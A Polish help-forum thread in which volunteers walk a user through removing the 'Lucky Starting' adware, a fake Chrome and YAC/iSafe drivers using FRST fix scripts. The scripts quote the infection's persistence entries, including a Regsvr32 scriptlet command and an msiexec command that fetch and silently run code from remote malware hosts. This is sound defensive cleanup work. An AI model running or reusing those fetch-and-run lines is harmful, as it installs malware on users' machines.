Wirus Lucky Starting

[gregory92m 0]

Witam.

Dopadł mnie pewien problem związany z wirusem Lucky Starting.

Bardzo prosiłbym o pomoc.

Poniżej wstawiam raport z ADW (mimo użycia programu problem nadal istnieje) :

 

http://wklejto.pl/283442

 

Logi z FRST:

 

FRST: http://www.wklejto.pl/283443

Addition: http://www.wklejto.pl/283444

Shortcut: http://www.wklejto.pl/283445

 

Z góry dziękuję za pomoc.

[filutka78 11]

To tylko INFO:

C:\Users\Grzegorz\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\Google Chrome.lnk

C:\Users\Grzegorz\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\TaskBar\Google Chrome.lnk

C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Google Chrome.lnk

C:\Users\Public\Desktop\Google Chrome.lnk

Te skróty dam do usuwania, bo przekierowują do fałszywej przeglądarki C:\Program Files (x86)\Cupduck\Application\chrome.exe, która wygląda jak Google Chrome, ale w rzeczywistości jest Trojanem.

Potem zrobisz sobie nowe skróty w tych samych lokalizacjach.

 

Ze skrótami przekierowującymi na fałszywego "Firefoxa" będzie podobnie (zresztą prawdziwej Mozilli Firefox nie widzę na liście Twoich programów, więc jej nie masz zainstalowanej).

 

1) Spróbuj odinstalować ten program:

YAC(Yet Another Cleaner!) (HKLM-x32\...\iSafe) (Version: - ELEX DO BRASIL PARTICIPAÇÕES LTDA) <==== UWAGA

 

2)Uruchom FRST. NA klawiaturze naciśnij jednocześnie CTRL+Y.Otworzy się Notatnik - wklej do niego:

RemoveDirectory: C:\Program Files (x86)\Cupduck

RemoveDirectory: C:\Program Files (x86)\Firefox

RemoveDirectory: C:\Program Files (x86)\Elex-tech

HKU\S-1-5-21-2413042632-1216326354-388712043-1001\...\ChromeHTML: -> C:\Program Files (x86)\Cupduck\Application\chrome.exe (Google Inc.) <==== UWAGA

Task: {DF048B94-A172-40E8-B9AD-DAD68D695AC7} - System32\Tasks\PowerWord-SCT-JT => Regsvr32.exe /s /i:hxxp://point.lotusiloveyou.com/?data=zDlkPGRvw2hpEaQ4rGYcMDQiZWYcMQ96Njk1wdN3zeN4nAh2OTVdM3z2wc== scrobj.dll

C:\Users\Grzegorz\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\Google Chrome.lnk

C:\Users\Grzegorz\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\TaskBar\Google Chrome.lnk

C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Google Chrome.lnk

C:\Users\Public\Desktop\Google Chrome.lnk

FirewallRules: [{EDBEDE33-F2DD-4712-9646-7A3F980AB62F}] => (Allow) C:\Program Files (x86)\Cupduck\Application\chrome.exe

FirewallRules: [{93344E5A-16C9-414D-9EA0-3C9CFFEA0621}] => (Allow) C:\Program Files (x86)\Firefox\bin\FirefoxUpdate.exe

FirewallRules: [{DCF6EF0D-E67E-4E79-977F-AFC812EF4033}] => (Allow) C:\Program Files (x86)\Firefox\Firefox.exe

2017-05-25 23:07 - 2017-05-25 23:50 - 00000000 ____D C:\Users\Grzegorz\AppData\LocalLow\Mozilla

2017-05-25 23:07 - 2017-05-25 23:38 - 00001997 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Mozilla Firefox.lnk

2017-05-25 23:07 - 2017-05-25 23:38 - 00001927 _____ C:\Users\Public\Desktop\Mozilla Firefox.lnk

2017-05-25 23:07 - 2017-05-25 23:21 - 00000000 ____D C:\Windows\system32\log

2017-05-25 23:07 - 2017-05-25 23:07 - 00000000 ____D C:\Users\Grzegorz\AppData\Roaming\Setleaf

2017-05-25 23:07 - 2017-05-25 23:07 - 00000000 ____D C:\Users\Grzegorz\AppData\Roaming\Mozilla

2017-05-25 23:07 - 2017-05-25 23:07 - 00000000 ____D C:\Users\Grzegorz\AppData\Roaming\Elex-tech

2017-05-25 23:07 - 2017-05-25 23:07 - 00000000 ____D C:\Program Files (x86)\Elex-tech

2017-05-25 23:06 - 2017-05-25 23:06 - 00000000 ____D C:\Users\Grzegorz\AppData\Local\Setleaf

2017-05-25 23:06 - 2017-05-25 23:06 - 00000000 ____D C:\Program Files (x86)\Setleaf

2017-05-25 23:05 - 2017-05-25 23:05 - 00000000 _____ C:\Windows\SysWOW64\55

2017-05-25 23:05 - 2017-05-25 23:05 - 00000000 _____ C:\Windows\SysWOW64\33

2017-05-25 23:04 - 2017-05-25 23:32 - 00034328 _____ (Sysinternals - www.sysinternals.com) C:\Windows\system32\Drivers\PROCEXP152.SYS

2017-05-25 23:04 - 2017-05-25 23:04 - 00000042 _____ C:\Windows\SysWOW64\GZ

2017-05-25 23:04 - 2017-05-25 23:04 - 00000000 _____ C:\Windows\SysWOW64\3333333

2017-05-25 23:04 - 2017-05-25 23:04 - 00000000 _____ C:\Windows\SysWOW64\1111111

2017-05-25 23:04 - 2017-05-25 23:04 - 00000000 _____ C:\Windows\SysWOW64\1111

2017-05-25 23:04 - 2017-05-25 23:04 - 00000000 _____ C:\Windows\SysWOW64\11

2017-05-25 23:04 - 2017-05-25 23:04 - 00000000 _____ C:\Windows\SysWOW64\00

2017-05-25 22:59 - 2017-05-25 23:32 - 00000000 ____D C:\Program Files (x86)\BiaoJi

2017-05-23 21:57 - 2017-05-23 21:57 - 00000000 ____D C:\Users\Grzegorz\AppData\Roaming\SSMgre

2017-05-25 23:38 - 2017-05-25 23:38 - 00000000 ____D C:\Users\Grzegorz\AppData\Roaming\Firefox

2017-05-25 23:38 - 2017-05-25 23:38 - 00000000 ____D C:\Users\Grzegorz\AppData\Roaming\Cupduck

2017-05-25 23:38 - 2017-05-25 23:38 - 00000000 ____D C:\Users\Grzegorz\AppData\Local\Firefox

2017-05-25 23:38 - 2017-05-25 23:38 - 00000000 ____D C:\Users\Grzegorz\AppData\Local\Cupduck

2017-05-25 23:38 - 2017-05-25 23:38 - 00000000 ____D C:\Program Files (x86)\Firefox

2017-05-25 23:37 - 2017-05-25 23:37 - 00000000 ____D C:\Program Files (x86)\Cupduck

2017-05-25 23:34 - 2016-05-19 08:42 - 00052392 _____ (Elex do Brasil Participações Ltda) C:\Windows\system32\Drivers\iSafeNetFilter.sys

2017-05-25 23:33 - 2017-05-25 23:33 - 00000000 ____D C:\Program Files (x86)\59274D91_jumpeasy

R1 iSafeKrnl; C:\Program Files (x86)\Elex-tech\YAC\iSafeKrnl.sys [262344 2016-05-23] (Elex do Brasil Participações Ltda) <==== UWAGA

S1 iSafeKrnlKit; C:\Program Files (x86)\Elex-tech\YAC\iSafeKrnlKit.sys [110112 2016-05-23] (Elex do Brasil Participações Ltda) <==== UWAGA

R1 iSafeKrnlMon; C:\Program Files (x86)\Elex-tech\YAC\iSafeKrnlMon.sys [52440 2016-05-23] (Elex do Brasil Participações Ltda) <==== UWAGA

R1 iSafeKrnlR3; C:\Program Files (x86)\Elex-tech\YAC\iSafeKrnlR3.sys [103904 2016-05-23] (Elex do Brasil Participações Ltda) <==== UWAGA

R1 iSafeNetFilter; C:\Windows\System32\DRIVERS\iSafeNetFilter.sys [52392 2016-05-19] (Elex do Brasil Participações Ltda) <==== UWAGA

R2 FirefoxU; C:\Program Files (x86)\Firefox\bin\FirefoxUpdate.exe [116376 2017-05-23] () <==== UWAGA

R2 WinCacheSrv; C:\ProgramData\Package Cache\{E01CB7F1-3E88-4450-1764-B3CC1E205C4A}v10.1.14393.795\Installers\30daf459e79c5d26366654b1b482e87.cab:dp [205826 ] () [brak podpisu cyfrowego] <==== UWAGA

HKU\S-1-5-21-2413042632-1216326354-388712043-1001\...\StartMenuInternet\ChromeHTML: -> C:\Program Files (x86)\Cupduck\Application\chrome.exe (Google Inc.) <==== UWAGA

FF ProfilePath: C:\Users\Grzegorz\AppData\Roaming\Firefox\Firefox\Profiles\k7yu7co7.default [2017-05-25]

FF Extension: (Polski Language Pack) - C:\Users\Grzegorz\AppData\Roaming\Firefox\Firefox\Profiles\k7yu7co7.default\Extensions\langpack-pl@firefox.mozilla.org.xpi [2017-05-25] [brak podpisu cyfrowego]

FF SearchPlugin: C:\Users\Grzegorz\AppData\Roaming\Firefox\Firefox\Profiles\k7yu7co7.default\searchplugins\startsearch.xml [2017-05-25]

IFEO\GoogleUpdate.exe: [Debugger] 324095823984.exe

IFEO\GoogleUpdaterService.exe: [Debugger] 8736459873644.exe

IFEO\taskmgr.exe: [Debugger]

HKU\S-1-5-21-2413042632-1216326354-388712043-1001\...\Policies\system: [shell] explorer.exe,msiexec.exe /i http://point.orangeiloveyou.com/?data=zDlkPGRvw2hpEaQ4rGYcMDQiZWYcMQ96Njk1wdN3zeN4nAh2OTVdM3z2wc== /q

C:\Users\Public\Desktop\Mozilla Firefox.lnk

C:\Users\Grzegorz\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\TaskBar\Mozilla Firefox.lnk

C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Mozilla Firefox.lnk

EmptyTemp:

Na klawiaturze naciśnij jednocześnie CTRL+S. W FRST kliknij na Fix (NAPRAW).

 

3) Zrób nowe logi FRST.

 

F.

[gregory92m 0]

Dzięki za pomoc i przepraszam za zwłokę.

Niestety problemy pozostały, mimo zastosowania powyższego zalecenia.

 

Fix Log

http://www.wklejto.pl/283863

 

Raport z ponownego użycia Adw

http://www.wklejto.pl/283864

 

I tu pojawia się problem z tym iSafe bo mimo teoretycznego jego usunięcia to jak uruchomię jeszcze raz skanowanie w Adw problem nie znika.

 

Frst

http://www.wklejto.pl/283865

 

Addition

 

http://www.wklejto.pl/283866

 

Shortcut

http://www.wklejto.pl/283867

 

Jesli chodzi zaś o YAC (Yet Another Cleaner!) zupełnie nie mogę go odinstalować gdyż pojawia się komunikat że to wirus.

 

Pozdrawiam .

[Gość]

Filutki78 nie ma na forum od 29 maja, więc jeśli nie chcesz na nią czekać wykonaj poniższe zalecenia bo w nowych logach widać że nie wszystko zostało usunięte z tego co zadała Filutka78 w swoim skrypcie.

 

Uruchom FRST a następnie (poprzez skrót klawiszowy CTRL + Y) otwórz notatnik. Wklej w nim poniższą zawartość:

 

CloseProcesses:
R2 iSafeService; C:\Program Files (x86)\Elex-tech\YAC\iSafeSvc.exe [130512 2017-05-22] (Elex do Brasil Participações Ltda)
R1 iSafeKrnl; C:\Program Files (x86)\Elex-tech\YAC\iSafeKrnl.sys [262344 2016-05-23] (Elex do Brasil Participações Ltda) <==== UWAGA
S1 iSafeKrnlKit; C:\Program Files (x86)\Elex-tech\YAC\iSafeKrnlKit.sys [110112 2016-05-23] (Elex do Brasil Participações Ltda) <==== UWAGA
R1 iSafeKrnlMon; C:\Program Files (x86)\Elex-tech\YAC\iSafeKrnlMon.sys [52440 2016-05-23] (Elex do Brasil Participações Ltda) <==== UWAGA
R1 iSafeKrnlR3; C:\Program Files (x86)\Elex-tech\YAC\iSafeKrnlR3.sys [103904 2016-05-23] (Elex do Brasil Participações Ltda) <==== UWAGA
R1 iSafeNetFilter; C:\Windows\System32\DRIVERS\iSafeNetFilter.sys [52392 2016-05-19] (Elex do Brasil Participações Ltda) <==== UWAGA
C:\Windows\system32\Drivers\iSafeNetFilter.sys
2017-05-30 19:15 - 2017-05-30 19:15 - 00000000 ____D C:\Users\Grzegorz\AppData\Roaming\Elex-tech
2017-05-25 23:07 - 2017-05-25 23:07 - 00000000 ____D C:\Program Files (x86)\Elex-tech
DeleteKey: HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\iSafe
DeleteKey: HKLM\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\iSafe
EmptyTemp:

 

Poprzez skrót klawiszowy CTRL + S zapisz zmiany w notatniku a następnie w FRST kliknij na Napraw. Na zakończenie naprawy wymagany restart systemu.